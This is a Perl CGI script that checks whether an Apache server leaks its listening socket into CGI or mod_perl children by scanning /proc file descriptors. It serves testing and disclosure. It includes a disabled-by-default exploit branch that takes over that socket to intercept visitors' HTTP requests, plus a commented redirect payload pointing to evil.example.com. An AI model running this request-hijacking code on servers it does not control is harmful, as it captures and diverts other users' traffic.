#!/usr/bin/perl -w
# Apache APR File Handle Inheritance test
#
# Scans this CGI process's own file descriptors (via Linux /proc) and
# reports whether a socket inherited from the web server is present.
# The optional, off-by-default $do_exploit section then demonstrates
# the impact by letting a forked child accept() on that socket.
# Output is written as a CGI response, so this is meant to be run by
# the web server, not from a shell.
#
# Note: This requires mod_perl for accurate test results.
# Version 1.0 - initial release
# Version 1.1 - fixed a condition that led to false positives
use strict;
use IO::Socket;
# By default this script will only test for the vulnerability.
# If you want to run the sample exploit, change this value to 1.
my $do_exploit = 0;
# Text the forked child writes back on a connection it takes from the
# server (exploit branch only).  $0 interpolates this script's own path.
my $payload_response = "HTTP/1.1 200 OK
Content-type: text/html
Success!
Success!
This http request was stolen from apache and was instead served by:
$0
";
# or, an alternative payload that does a redirect.
# $payload_response = "HTTP/1.1 302 Found\nLocation: http://evil.example.com/page.htm\n\n";
# This is not the payload!  It is the CGI header for the test's own
# output (declared text/html, although the body printed below is plain
# text with no markup).
print "Content-type: text/html\n\nApache APR Exploit Test\n\n";
my $sock;            # IO::Socket wrapper around an inherited descriptor (exploit branch only)
my $i;               # descriptor number; loop variable for the scans below
my $client;          # connection accepted on $sock (exploit branch only)
my $buf;             # raw request bytes recv'd from $client (exploit branch only)
my $link_target;     # readlink result for /proc/$$/fd/<n>
my @sockets;         # descriptors > 2 whose /proc link starts with "socket:"
my $vulnerable = 0;  # set to 1 by the scan when fd 3 is such a socket
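# Enumerate this process's open descriptors through Linux /proc and
# print one line per descriptor.  Descriptors above 2 that resolve to a
# socket are collected in @sockets; a socket sitting at fd 3 (the first
# free number after stdin/stdout/stderr) is the indicator this script
# uses to flag the server as vulnerable, i.e. the server's own socket
# was left open in the CGI/mod_perl child.
#
# readlink is called directly instead of after an -e test: the
# descriptor can disappear between the two calls, and readlink returns
# undef for a missing entry either way, so an undef result is skipped
# rather than printed (the original -e/readlink pair could emit a bare
# "<n>: " line plus an uninitialized-value warning).  The scan stops at
# fd 1000, so a socket above that number would not be reported.
for my $fd (0 .. 1000) {
    my $target = readlink "/proc/$$/fd/$fd";
    next unless defined $target;        # not open, or /proc unavailable
    print "$fd: $target";
    print " (STDIN)"  if $fd == 0;
    print " (STDOUT)" if $fd == 1;
    print " (STDERR)" if $fd == 2;
    if ($fd > 2 && $target =~ /^socket:/) {
        push @sockets, $fd;
        $vulnerable = 1 if $fd == 3;    # heuristic: see header comment
    }
    print "\n\n";
}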
# Optional impact demonstration, gated by $do_exploit (0 unless edited).
# The parent forks; the child wraps the first inherited socket
# descriptor found by the scan above and accept()s a single connection
# on it, answering with $payload_response instead of letting the server
# handle it.  Nothing in this block changes the detection verdict.
#
# Mitigation note: the underlying condition is a listening socket that
# stays open across the fork into CGI or mod_perl code.  Opening such
# sockets close-on-exec, or closing inherited descriptors before running
# handlers, leaves nothing here for a child process to accept() on.
if ($do_exploit) {
my $pid = fork();
if (not defined $pid) {
# fork failed: report it and fall through to the verdict below.
print "ERROR: resources not avilable to fork
\n";
} elsif ($pid == 0) {
# Child.  The list has exactly one element, $sockets[0].  If the scan
# found no sockets that element is undef and new_from_fd is handed
# undef -- presumably it then returns false and the child just falls
# through to the verdict (not verified here).
foreach $i (($sockets[0])) {
$sock = IO::Socket->new_from_fd($i, "w");
if ($sock) {
# Wait for a connection on the inherited listener.
$client = $sock->accept();
if ($client) {
# Read up to 4096 bytes of the request, send the canned response,
# then echo the request back with every newline doubled (the
# replacement below is "\n" followed by a literal newline).
$client->recv($buf, 4096);
print $client $payload_response;
$buf =~ s/\n/\n
/g;
print $client "Stole a request:
\n";
print $client "Data received from client:
$buf
\n";
close ($client);
# The only path on which the child exits here.  If $sock or $client
# is false the child continues past this block and prints the
# verdict as well.
exit 0;
}
}
}
} else {
# Parent: report what the child is doing and continue to the verdict.
print "Malicious Child Launched
\n";
print "Listening on socket handle number $sockets[0]\n";
print "forked off PID number $pid to steal a request
\n";
}
}
# Final verdict for the CGI output.  $vulnerable was set by the
# descriptor scan above when fd 3 resolved to a socket.
my $verdict = $vulnerable
    ? "THIS SERVER IS VULNERABLE\n\n"
    : "This server is not vulnerable\n\n";
print $verdict;
# This is not the payload!  Just a trailing blank line.
print "\n";